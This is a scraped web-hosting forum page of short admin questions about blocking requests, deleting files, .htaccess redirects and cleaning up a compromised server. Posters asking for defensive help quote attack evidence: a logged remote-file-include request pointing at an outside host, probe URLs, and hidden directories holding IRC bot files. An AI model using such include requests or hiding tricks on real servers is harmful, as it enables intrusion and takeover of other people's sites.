Block GET Requests To Specific Files
Apr 12, 2009
I am getting a lot of GET requests from different IPs to 4 nonexistent PHP files on my server. Is there any way to block the requests to avoid the resources use of apache that these requests are generating?
I have installed mod_security but Im not sure about how the block rule should be.
The requests are going to images/log.php, images/log2.php, images/log3.php and images/logi.php of one of the sites hosted on the server, is there any way to block there requests for a specific domain or path?
View 3 Replies
ADVERTISEMENT
Jul 25, 2009
Should I block ping request to my servers from WAN?
View 12 Replies
View Related
Apr 17, 2007
if there is a rule to add to firewall or mod_security to ban any IP which is sending more xx number of POST requests to the same URL?
View 6 Replies
View Related
Jan 21, 2014
I have been trying to solve a big problem for the last 2 weeks with one of our servers.
The client using our system (web based w/ apache and php) is a contact center firm. They have about 120 operators, all connect to our websever with the same IP.
We have been suffering DoS attacks from some of these operators. This are simple, browser attacks , namely 5 or 10 operators will just hold F5 key and bombard the server with requests when they shouldnt.
We did manage to produce a php protection which will recognize the multiple requests and blacklist the user, but its "too late" because the request have already been sent and processed by the webserver.
We use the user ID in the system to control who should be blacklisted, so this is all dependent on our own authentication.
Ideally, we need something EXACTLY like mod_evasive, but for rejecting single requests instead of blocking the IP. Exemplifying : if a user calls the same url, 5 times, in a 3 second spawn, we will reject every next request for 30 seconds, but only the requests by that user.
If the webserver can make any use of it, the user id is stored in a cookie.
View 4 Replies
View Related
Jun 24, 2007
I want to block all http requests coming to my website via proxy. Is there any way/script to achieve this on the server?
View 5 Replies
View Related
Jun 12, 2008
Is there any way to block a particular ISP? Have a visitor that changes IP hourly, but the IP always resolves back to a hostname like dsl.yuns.sksk.uk .
I have CSF installed. Any way to block all visitors from dsl.yuns.sksk.uk?
View 3 Replies
View Related
Jun 17, 2008
how to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using Default Mod_Securty and also Mod_security from [url]
But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.
The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.
=================================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....
View 1 Replies
View Related
Mar 18, 2013
I don't know how to block a specific QUERY STRING url via .htaccess file, well actually I want to block this type of url :
test.php?q=RANDOMTEXT=&tl=The%20path%20ends
View 2 Replies
View Related
May 19, 2014
I'm trying to use spamfilter to block mail from specific address, adding this e-mail to spamfilter in mail account settings, but it doesn't work. In logs I see:
spamc[13430]: skipped message, greater than max message size (256000 bytes).
View 8 Replies
View Related
Oct 10, 2007
In one folder, I have thousand of files, and I want to delete 100 specific files. Saying specific files, I mean all of them has a keyword. So, I can find out all of them by using
grep "keyword" *
but dont know how to delete all of them. Not deleting one by one.
View 2 Replies
View Related
Jan 4, 2007
Useful unix-command trick to quickly remove i.e. Thumbs.db files, WS_FTP.LOG files or *.fla files, recursively through directories.
It could be a real pain on a huge directory tree ;-)
Removing all *.fla files from /home/user/ and subdirectories...
Code:
# find /home/user/ -name *.fla -ok rm {} ;
Removing all WS_FTP.LOG files from /home/user and subdirectories...
Code:
# find /home/user -name WS_FTP.LOG -ok rm {} ;
Removing all Thumbs.db files from /home/user and subdirectories...
Code:
find /home/user -name Thumbs.db -ok rm -f {} ;
View 14 Replies
View Related
Jun 28, 2008
Is there a quick shell command to find (inside a directory) and delete all the files created e.g. on January 10, 2008 ?
View 2 Replies
View Related
Aug 15, 2008
to delete file1010.jpg and filetest.jpg from /public_html/Storage
problem is there are hundred thousands .jpg files stored on /public_html/Storage
How can I easily search for these 2 files and delete it?
I am using Cpanel & Ftp Program Ws ftp pro, Which one is better to use to do the job?
View 3 Replies
View Related
Sep 20, 2013
I'm backing up a domain in Plesk Panel 11.0.9 on Windows, it's a large backup with 50,000+ images in it so the backup gets split into multiple zips
xxxxxx__xxxxxx.com_vhost_1309200100.zip
xxxxxx__xxxxxx.com_vhost_1309200100.zip1
xxxxxx__xxxxxx.com_vhost_1309200100.zip2
xxxxxx__xxxxxx.com_vhost_1309200100.zip3
Now what I want to do is restore 11 files from the backup. What I certainly don't want to do is restore the entire domain as I don't want to loose any changes since the last backup.
As it seems impossible to extract files from the archives.
View 2 Replies
View Related
May 20, 2015
I have question: How to redirect specific useragent on specific URLs to specific URLs in .htaccess [Question]
E.g.:
I want to redirect 301 with conditional:
Code:
useragent: Firefox
from my url1: domain[dot]com/old-url1/
from my url2: domain[dot]com/old-url2/
to
Code:
to new url1: in my url1: domain[dot]com/new-url1/
to new url2: in my url1: domain[dot]com/new-url2/
I create this in my .htaccess but not work
Code:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} googlebot [NC]
RewriteRule ^/?this-is-url/?$ domain[dot]com [L,R,NC]
View 1 Replies
View Related
Oct 19, 2009
I block them in htaccess but their repeated attacks is making my server load crazy.
I installed AFP but it doesn't do anything, where do I set rules on automatic blocking?
View 14 Replies
View Related
Apr 20, 2005
I set up a cron to run every minute & I'm running a PHP script by way of cron like
wget http://example.com/some_script.php
Now does each request of Cron is a seperate HTTP Request or what? Say my script takes more than 1 minute to execute completely but before its completed, its called again. So, will that effect the PHP script running because of previous HTTP Request or will it create a new HTTP Request & let the previous request finish its operation? Technically, it shouldn't block/affect the previous request, but I'm not sure!!
View 6 Replies
View Related
Jul 25, 2008
my server is still effed up from the MPack attack that I received.
I just received the following email, does anyone know what this means or how it could be done? The client IP is mine, so some how my server is sending that request?
72.233.79.2 (malwarebytes.org) Server Log:
[Thu Jul 24 13:05:07 2008] [error] [client 72.55.184.144] mod_security:
Access denied with code 403. Pattern match ".../" at THE_REQUEST
[id "300006"] [rev "1"] [msg "Bogus Path denied"] [severity "CRITICAL"]
[hostname "www.malwarebytes.org"] [uri
"/errors.php?error=[url][unique_id "tNAGeH8AAAEAAEsfD7wAAAAO"]
[Thu Jul 24 13:05:07 2008] [error] [client 72.55.184.144] mod_security:
Access denied with code 403. Pattern match ".../" at THE_REQUEST
[id "300006"] [rev "1"] [msg "Bogus Path denied"] [severity "CRITICAL"]
[hostname "www.malwarebytes.org"] [uri
"/forums/errors.php?error=[url][unique_id
"tNAPAn8AAAEAAD7mqWQAAAAl"]
[url]is the RKHunter scan log
[url]is the ChkRootKit scan log.
I'm going through this thread right now:
[url]("How-to detect a possible intruder?") and I've come across a handful of hidden directories:
/home/mifbody/public_html/vbulletin/arcade/images/. /. /xh
/home/mifbody/public_html/vbulletin/arcade/images/. /. /xhide.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/convertxdccfile.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_admin.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_dccchat.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_display.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_main.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_md5.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_misc.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_statefile.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_transfer.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_upload.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /obj/iroffer_utilities.o
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/convertxdccfile.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_admin.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_config.h
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_dccchat.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_defines.h
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_display.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_globals.h
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_headers.h
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_main.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_md5.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_md5.h
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_misc.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_statefile.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_transfer.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_upload.c
/home/mifbody/public_html/vbulletin/arcade/images/. /. /src/iroffer_utilities.c
I was able to successfully delete all the files, but how do I now get rid of the directories themselves? When I do:
rm -fr "/arcade/images/. /"
and then locate ". "
I still get:
/home/mifbody/public_html/vbulletin/adserver/banners/.
/home/mifbody/public_html/vbulletin/alice/src/admin/.
/home/mifbody/public_html/vbulletin/arcade/images/.
View 2 Replies
View Related
Oct 31, 2008
I think mellowhost has gone now,
I have some pending request and helps request.
there is nothing to reply.
even the ffmpeg services have some error and they only 3mb allow to upload file.
i dont know happen to this company...
I post here not for bad reviews, otherwise to call their attentions.
because even i use the forums for mellowhost, and submit some tickets. nothing response from them.
View 4 Replies
View Related
Jan 12, 2008
Quote:
netstat -anpl|grep 80|grep 74.xx.179.xxx|wc -l
990
I observed too many http requests into the server, so just wonder how your guys twaek server to accept over 1000 request and more?
View 8 Replies
View Related
Mar 3, 2007
I've just been having a look through my logwatch e-mail, and have seen the following that I've not seen before:
Code:
A total of 3 unidentified 'other' records logged
GET http:/ /74.52.21.101/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.100/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.102/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
NB. I've added a space in the URL to break the link.
what is happening here, as this looks to be something dodgy.
View 3 Replies
View Related
Jan 19, 2007
I have a guy who can't get to any of the 100 or so virtual hosts on my RHEL3 server.
It's running the latest Apache RPM from RedHat. I also have mod_evasive and mod_security running.
Here's what I know. The guy *CAN* connect via SSH and FTP. The guy *CAN* see the default web page when he hits the IP in his web browser (e.g. he types [url]into the address bar on IE). But when he uses any of the host names on the server he *CAN NOT* see anything. He gets timeout errors.
His IP in NOT in ANY error logs, it's not in mod_evasive or mod_security, it's not in IPTABLES, it's not anywhere I can see.
I must be missing something. Anyone have any ideas?
What would be in front of Apache blocking his requests?
View 5 Replies
View Related
Feb 8, 2007
I have a dedicated box with softlayer and I have noticed at varying times the past few months that with sites we host, sometimes the connection times out (I'll try to access like 5 or 6 sites within 30 seconds or so and they all drop, then a minute later they load fine).
I opened a support ticket and they said it usually has to do with the # of requests Apache can handle, and that this can be modified. They stated they could: "tweak the apache configuration file in this server that can make it possible to handle more requests."
So my question is what should the # of requests be set to? (I'm not sure what it is now, but I assume whatever the default # is).
View 6 Replies
View Related
Mar 28, 2008
I have a Qmail server that is using relays.ordb.org
As you probaly know this shut down two years ago. But is now sending all requests as spam. No one is recieving there emails.
this a Standard Qmail,with a hacked qmail-send witch intergrates with Mysqld.
is not installed with qmailroks, or supervise. Can't find the config text file.
how can we remove traces or referrences to relays ordb.org
View 11 Replies
View Related
Jun 26, 2009
We're trying to optimize the speed of our website. It's hosted on its own box.
We're looking for software that will monitor/aggregate the time it takes for certain requests -- For example, we would like to see which files it takes the longest to serve.
Is there server-side software that will take care of this?
Linux/Apache/PHP/SQL
View 8 Replies
View Related
Mar 31, 2008
I have been experiencing a lot of Keepalive requests for a particular image on a particular domain. please see the lines below.
0-11233931/63/63K 0.15100.40.030.03 195.68.185.13mydomain.comGET http://mydomain.com//images/logo.jpg HTTP/1.1
1-11233941/77/77K 0.18100.40.050.05 122.164.58.63mydomain.comGET http://mydomain.com//images/logo.jpg HTTP/1.1
2-11233951/42/42K 0.76000.40.170.17 89.139.214.74mydomain.comGET http://mydomain.com//images/logo.jpg HTTP/1.1
3-11233971/57/57K 0.04000.40.020.02 82.199.98.229mydomain.comGET http://mydomain.com//images/logo.jpg HTTP/1.1
4-11233981/46/46K 0.27000.40.040.04 217.150.55.41mydomain.comGET http://mydomain.com//images/logo.jpg HTTP/1.1
These are just a few lines from the top.
How can i prevent this from happening.. it seems as a SYN Flood, or maybe a DDoS.
View 3 Replies
View Related
Aug 8, 2008
I maintain Java servlet applications on my hosting platform [hosting-q.com] and access the applications from another site [wiredpages.qisoftware.com]. Today, there was a demand problem which caused the hosting server to block access to requests from the other domain.
Do you know if there is an .htaccess directive that can perform this blocking or some sort of system trigger?
The thing is-- only the servlets requested from the external domain and not requests from the originating domain [or hosting domain] were blocked.
View 0 Replies
View Related
